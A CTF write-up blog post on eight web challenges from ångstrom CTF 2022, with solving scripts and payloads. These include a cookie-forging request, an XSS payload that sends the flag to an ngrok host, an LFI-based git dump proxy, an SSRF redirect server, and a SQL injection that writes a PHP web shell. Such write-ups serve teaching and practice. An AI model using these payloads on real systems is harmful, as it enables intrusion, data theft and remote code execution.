---
title: "ångstrom CTF 2022"
date: 2022-05-11T14:22:48+02:00
draft: false
categories:
    - CTF
tags:
    - WEB
    - SQLi
    - XSS
---

# ångstrom CTF 2022

Name | Category |  CTF Time
------------|----------|---- 
**ångstrom CTF 2022**| **Web** |  **https://ctftime.org/event/1588**

# [*] INDEX:

- [The Flash](#the-flash---web)
- [Auth Skip](#auth-skip---web)
- [Crumbs](#crumbs---web)
- [Xtra Salty Sardines](#xtra-salty-sardines---web)
- [Art Gallery](#art-gallery---web)
- [School Unblocker](#school-unblocker---web)
- [Secure Vault](#secure-vault---web)
- [No Flags?](#no-flags---web)

## The Flash - Web

The JS of the website is replacing the real flag with a fake one very quickly. Here we can interrupt the execution of the JS in the browser and get the flag :

![image](https://user-images.githubusercontent.com/76447395/167029040-eaa5d5df-af48-464f-a559-d9a34db62fe6.png)

> actf{sp33dy_l1ke_th3_fl4sh}

## Auth Skip - Web

In this challenge the source code is given, if we look at the source we can see that if the server receives an admin cookie, we'll get the flag :

```js
    if (req.cookies.user === "admin") {
        res.type("text/plain").send(flag);
    } else {
        res.sendFile(path.join(__dirname, "index.html"));
    }
```

Let's perform a request with that cookie format :

```python
import requests
data = {'user': 'admin'}
print(requests.get("https://auth-skip.web.actf.co/", cookies=data).text)
```

> actf{passwordless_authentication_is_the_new_hip_thing}

## crumbs - Web

For this challenge we need to create our own script, when we go to the website we see this :

![image](https://user-images.githubusercontent.com/76447395/167029908-1061f3e8-0682-49b6-a117-bc6b38bc7854.png)

and if we follow that directory another directory is given :

![image](https://user-images.githubusercontent.com/76447395/167029978-54165d51-0ad7-4386-a8b3-5a5f00c4c748.png)

This will happend 1000 times :

```js
const paths = {};
let curr = crypto.randomUUID();
let first = curr;

for (let i = 0; i < 1000; ++i) {
    paths[curr] = crypto.randomUUID();
    curr = paths[curr];
}

paths[curr] = "flag";
```

So let's create a script that automates that :

```python
import requests
import re

pattern = "to (.*)"
r = requests.get("https://crumbs.web.actf.co/") 

while (len(re.findall(pattern, r.text)) != 0):
    path = re.findall(pattern, r.text)
    r = requests.get("https://crumbs.web.actf.co/" + path[0])
    print(re.findall(pattern, r.text))
```

In my case I used regex to check if it's still a directory or if it's finally the flag :

![image](https://user-images.githubusercontent.com/76447395/167031162-8216a901-ad47-4775-9dd5-385a5ea7837d.png)

Let's get the flag :

![image](https://user-images.githubusercontent.com/76447395/167031225-72ea16c7-cf9d-4e87-af0a-09fde001057b.png)

> actf{w4ke_up_to_th3_m0on_6bdc10d7c6d5}

## Xtra Salty Sardines - Web

In this challenge we have to get an XSS and then pass it to the admin, if we look at the source code we see that some chars are parsed : 

```js
const name = req.body.name
    .replace("&", "&amp;")
    .replace('"', "&quot;")
    .replace("'", "&apos;")
    .replace("<", "&lt;")
    .replace(">", "&gt;");
```

But only the first character is replaced :

![image](https://user-images.githubusercontent.com/76447395/167032627-41b67510-6c9b-4d15-a397-f435a80878b4.png)

This is because it's using RegEx and the global flag must be set otherwise only the first occurrence will be replaced. So let's try with the following payload :

`<img><img src=x onerror=alert(1)>`

![image](https://user-images.githubusercontent.com/76447395/167032804-58894a4f-2b3d-4849-9708-2025aac79cd7.png)

We know that the flag is in `/flag` :

```js
app.get("/flag", (req, res) => {
    if (req.cookies.secret === secret) {
        res.send(flag);
    } else {
        res.send("you can't view this >:(");
    }
});
```

So we have to request `/flag` and then exfiltrate the content, in my case I used this :

```js
fetch('/flag')
    .then(function (response) { return response.text(); })
    .then(function(data) {fetch('https://--------.ngrok.io/?'+btoa(data));})
```

Final payload :

`<script>"'<script>fetch('/flag').then(function (response) { return response.text(); }).then(function(data) {fetch("https://--------.ngrok.io/?"+btoa(data));})`

![image](https://user-images.githubusercontent.com/76447395/167037181-a2f795b6-95f8-463d-a96a-e3edc1d9d725.png)

> actf{those_sardines_are_yummy_yummy_in_my_tummy}

## Art Gallery - Web

The website is actually vulnerable against LFI : 

![image](https://user-images.githubusercontent.com/76447395/167122082-0dfc8505-4ddb-4990-9e0b-c93aa995583c.png)

And we see that that's a git repository : 

![image](https://user-images.githubusercontent.com/76447395/167129750-7646b417-e203-4578-9dc1-72a9defd0088.png)

Let's dump it using [GitTools](https://github.com/internetwache/GitTools). But first we have to filter by non-text files, let's open a flask server :

```py
from flask import Flask, Response
import requests
from sympy import true

app = Flask(__name__)

@app.route('/<path:f>')
def index(f):
    res = requests.get("https://art-gallery.web.actf.co/gallery?member=../" + f)
    if res.headers['content-type'] == 'application/octet-stream':
        return res.content
    else: 
        return Response(status=404)

app.run(debug=True)
```

And then run `./gitdumper.sh http://localhost:5000/.git/ .`. Send the output to `/Extractor` and run `./extractor.sh . .` :

![image](https://user-images.githubusercontent.com/76447395/167130028-a3319356-129a-49c3-b2d8-0aa250e85a7d.png)

Let's grab the flag :

![image](https://user-images.githubusercontent.com/76447395/167130080-29c31f7e-bdd3-4bc9-8669-66231f3a3639.png)

> actf{lfi_me_alone_and_git_out_341n4kaf5u59v}

## School Unblocker - Web

This web application is actually vulnerable against SSRF (Server Side Request Forgery). We have to give a non private IP URL and then the server will request (POST) to the url provided, in my case I decided to build a server and redirect to localhost, due to the fact that any localhost URL is rejected : 

```py
from flask import Flask, redirect
app = Flask(__name__)

@app.route('/', methods=['GET', 'POST'])
def root():
    return redirect('http://localhost:8080/flag', code=307)

if __name__ == "__main__":
    app.run(debug=True, port=8000)
```

Then use `ngrok` :

![image](https://user-images.githubusercontent.com/76447395/167160698-113b2485-742f-4d87-b024-2230b62b32f8.png)

> actf{dont_authenticate_via_ip_please}

## Secure Vault - Web

The vulnerability of this challenge is an inproper implementation of `uid`, which is using `Math.random()` function. This function is cryptographically insecure for random number generator. This is because in most browsers, `Math.random()` is implemented using a pseudo-random number generator (PRNG). This means that the random number is derived from an internal state, mangled by a deterministic algorithm for every new random number. It seems random to the user because the algorithm is tuned in such a way that it appears so. However, if you know the generator's internal state, you know all the future numbers generated by it. 

Although, we can see that here is the check :

```js
app.get("/vault", (req, res) => {
    if (!res.locals.user) {
        res.status(401).send("Log in first");
        return;
    }
    const user = users.get(res.locals.user.uid);
    res.type("text/plain").send(user.restricted ? user.vault : flag);
});
```

We see that in the case that `user.restricted` is `false`, the flag will be shown. But when we create a user the `restricted` parameter is set to `true` :

```js
insert(username, password) {
    const uid = Math.random().toString();
    this.users[uid] = {
        username,
        uid,
        password,
        vault: "put something here!",
        restricted: false,
    };
    this.usernames[username] = uid;
    return uid;
}
```

But the funny thing here is the fact that when the user is removed :

```js
app.post("/delete", (req, res) => {
    if (res.locals.user) {
        users.remove(res.locals.user.uid);
    }
    res.clearCookie("token");
    res.redirect("/");
});
```

The user will be deleted from the database but the token will still be valid. If we try to use the token after the account is deleted `UserStore.get` will return `{}` for the user. Doing this interprets `user.restricted` as `false` which will allow you to get the flag.

![image](https://user-images.githubusercontent.com/76447395/167210949-1f88edfd-ecac-4d1b-9154-c548a572e652.png)

> actf{is_this_what_uaf_is}

## No Flags? - Web

This chalenge is written in PHP and looking at the source code we can realize that it's about SQL Injection :

```php
$pdo = new PDO("sqlite:/tmp/$dbname.db");
if ($init) {
    $pdo->exec("CREATE TABLE Flags (flag string); INSERT INTO Flags VALUES ('actf{not_the_flag}'), ('actf{maybe_the_flag}')");
}
if (isset($_POST["flag"])) {
    $flag = $_POST["flag"];
    $pdo->exec("INSERT INTO Flags VALUES ('$flag');");
}
foreach ($pdo->query("SELECT * FROM Flags") as $row) {
    echo "<li>" . htmlspecialchars($row["flag"]) . "</li>";
}
```

But for this chall we have to get RCE (Remote Code Execution), in this case `Dockerfile` is provided  and we can overwrite a file :

```bash
RUN mkdir /var/www/html/abyss &&\
    chown -R root:root /var/www/html/abyss &&\
    chmod -R 333 abyss
```

`abyss` is the directory we'll try inject the shell with the following payload :

```sql
'); ATTACH DATABASE '/var/www/html/abyss/maiky.php' AS wiki; CREATE TABLE wiki.pwn (dataz text); INSERT INTO wiki.pwn (dataz) VALUES ('<?php system($_GET["cmd"]); ?>'); -- - 
```

![image](https://user-images.githubusercontent.com/76447395/167218545-65d61a64-cb7b-4715-8b41-b8d4cd4d7edd.png)

Nice! 

![image](https://user-images.githubusercontent.com/76447395/167218627-64a70048-eea4-454c-b785-3bc232c3dacc.png)

> actf{why_do_people_still_use_php} 

